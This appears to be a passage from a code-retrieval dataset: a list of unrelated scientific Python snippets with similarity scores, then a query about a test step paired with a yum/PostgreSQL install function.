Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def nits(self):", "def __init__(self, prim):\n self.actual = prim", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if 
n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def prove_NA1() -> Proof:\n # Optional Task 6.9a", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 
1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def eulerphi(n):\r\n\treturn euler_phi(n)", "async def _design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. 
#r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def marcovNuc (i = random.choice(stateSpace), step = 100):\n # matrix of transition probabilities\n #matrix = [[0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25]] \n matrix = [[0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1]] \n step += 1 # add one to the range because we remove it at the end\n sims = [] # List to hold the results of the Marcov chain\n sims.append(i) # append the seed value to the sims list\n for x in range(step):\n \n if sims[-1] == 'A':\n w = np.random.random() # Random number generator\n # the next set of if statements determine where the random number \n # sits on the number line of probabilities\n if matrix[0][0] > w:\n sims.append('A')\n elif matrix[0][1] + matrix[0][0] > w:\n sims.append('C')\n elif matrix[0][2] + matrix[0][1] + matrix[0][0] > w:\n sims.append('G')\n else:\n sims.append('T')\n elif sims[-1] == 'C':\n x = np.random.random()\n if matrix[1][0] > x:\n sims.append('A')\n elif matrix[1][1] + matrix[1][0] > x:\n sims.append('C')\n elif matrix[1][2] + matrix[1][1] + matrix[1][0] > x:\n sims.append('G')\n else:\n sims.append('T')\n \n elif sims[-1] == 'G':\n y = np.random.random()\n if matrix[2][0] > y:\n sims.append('A')\n elif matrix[2][1] + matrix[2][0] > y:\n sims.append('C')\n elif matrix[2][2] + matrix[2][1] + matrix[2][0] > y:\n sims.append('G')\n else:\n sims.append('T')\n\n else:\n z = np.random.random()\n if matrix[3][0] > z:\n sims.append('A')\n elif matrix[3][1] + matrix[3][0] > z:\n sims.append('C')\n elif matrix[3][2] + matrix[3][1] + matrix[3][0] > z:\n sims.append('G')\n 
else:\n sims.append('T')\n\n return sims[1:-1] # remove the initial value (the seed)", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def eulerphi(n):\n\treturn euler_phi(n)", "def main() -> int:\n ucvm_out = \"\"\n for j in frange(CORNERS[\"bl\"][\"n\"], CORNERS[\"ur\"][\"n\"], SPACING):\n for i in frange(CORNERS[\"bl\"][\"e\"], CORNERS[\"ur\"][\"e\"] + SPACING, SPACING):\n ucvm_out += \"%.2f %.2f 0\\n\" % (i, j)\n os.chdir(\"/Users/davidgil/ucvm-15.10.0/bin\")\n proc = Popen(\n [\"./ucvm_query\", \"-f\", \"../conf/ucvm.conf\"], stdout=PIPE, stdin=PIPE, stderr=STDOUT\n )\n out_arr = np.zeros(\n shape=(\n int((CORNERS[\"ur\"][\"n\"] - CORNERS[\"bl\"][\"n\"]) / SPACING) + 2,\n int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING) + 2\n )\n )\n output = proc.communicate(input=ucvm_out.encode(\"ASCII\"))[0]\n i = 0\n j = 0\n for line in output.decode(\"ASCII\").split(\"\\n\")[2:-1]:\n line_split = line.split()\n try:\n out_arr[j][i] = float(line_split[4])\n except IndexError:\n print(line_split)\n if i == int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING):\n i = 0\n j += 1\n else:\n i += 1\n np.save(\"vs30.dat\", out_arr)\n return 0", "def em_step(t, eng, fre):\n\t# TODO\n tcount = {}\n total = {}\n for word_eng in t:\n total[word_eng] = 0\n for word_fre in t[word_eng]:\n t[word_eng][word_fre] = 0\n num_sentences = len(eng)\n for i in range(num_sentences):\n list_eng = eng[i].split(\" \")\n list_fre = fre[i].split(\" \")\n for word_fre in set(list_fre):\n denom_c = 0\n for word_eng in set(list_eng):\n denom_c += t[word_eng][word_fre]*list_fre.count(word_fre)\n for word_eng in set(list_eng):\n tcount[word_eng][word_fre] += t[word_eng][word_fre]*list_fre.count(word_fre)*list_eng(word_eng)/denom_c\n total[word_eng] = t[word_eng][word_fre]*list_fre.count(word_fre)*list_eng(word_eng)/denom_c\n for word_eng in total:\n for word_fre in tcound[word_eng]:\n t[word_eng][word_fre] = tcound[word_eng][word_fre]/total[word_eng]", "def exercise_b2_113():\r\n pass", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def _mn_par_ ( self , i ) :\n if not i in self : raise IndexError\n #\n val = ctypes.c_double ( 0 ) \n err = ctypes.c_double ( 0 ) \n #\n res = self.GetParameter ( i , val , err )\n #\n val = float ( val.value )\n err = float ( err.value )\n #\n return VE ( val , err*err )" ]
[ "0.5948996", "0.5655197", "0.5646285", "0.5632018", "0.5629894", "0.5600689", "0.55927324", "0.54705757", "0.54594123", "0.5431765", "0.5404841", "0.5401604", "0.5367439", "0.53368443", "0.5317328", "0.53077716", "0.52990746", "0.52621627", "0.52585423", "0.52466846", "0.52450603", "0.5238577", "0.5235679", "0.5223775", "0.5216934", "0.52106124", "0.52087164", "0.5193675", "0.5188455", "0.5186024", "0.51597536", "0.5159132", "0.5159009", "0.515671", "0.51557046", "0.5153941", "0.515064", "0.51490223", "0.5148604", "0.51405764", "0.51242006", "0.51230866", "0.5121098", "0.51169574", "0.50965106", "0.5094377", "0.5093582", "0.50931126", "0.5091448", "0.5090482", "0.50898373", "0.5087949", "0.50874853", "0.5085533", "0.50783527", "0.50763047", "0.5075695", "0.5070952", "0.50646245", "0.50616425", "0.50553375", "0.5048299", "0.50445664", "0.50444627", "0.5035679", "0.50336206", "0.502815", "0.5020968", "0.50193655", "0.5016787", "0.5015277", "0.50135654", "0.5010255", "0.5000162", "0.49981293", "0.49964157", "0.49944356", "0.49940455", "0.49935564", "0.49926898", "0.49910465", "0.4990586", "0.49885014", "0.49878007", "0.49867198", "0.4986022", "0.49833173", "0.4977892", "0.49654064", "0.49626786", "0.49600217", "0.49582273", "0.49545735", "0.49479085", "0.49451637", "0.49369237", "0.4935183", "0.4930822", "0.492511", "0.49233764", "0.4916852" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.2
def install(version=minv.__version__, release="1"): sudo("yum install -y %s" % " ".join(RPMS)) sudo("yum install -y minv-%s-%s.noarch.rpm" % (version, release)) sudo( 'printf "abcdefghijklmnopq\nabcdefghijklmnopq" ' '| sh minv_install_postgresql.sh --tablespace /disk/minv_tablespace/' )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n 
C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def test_get_nveto_pmts(self):\n pass", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n 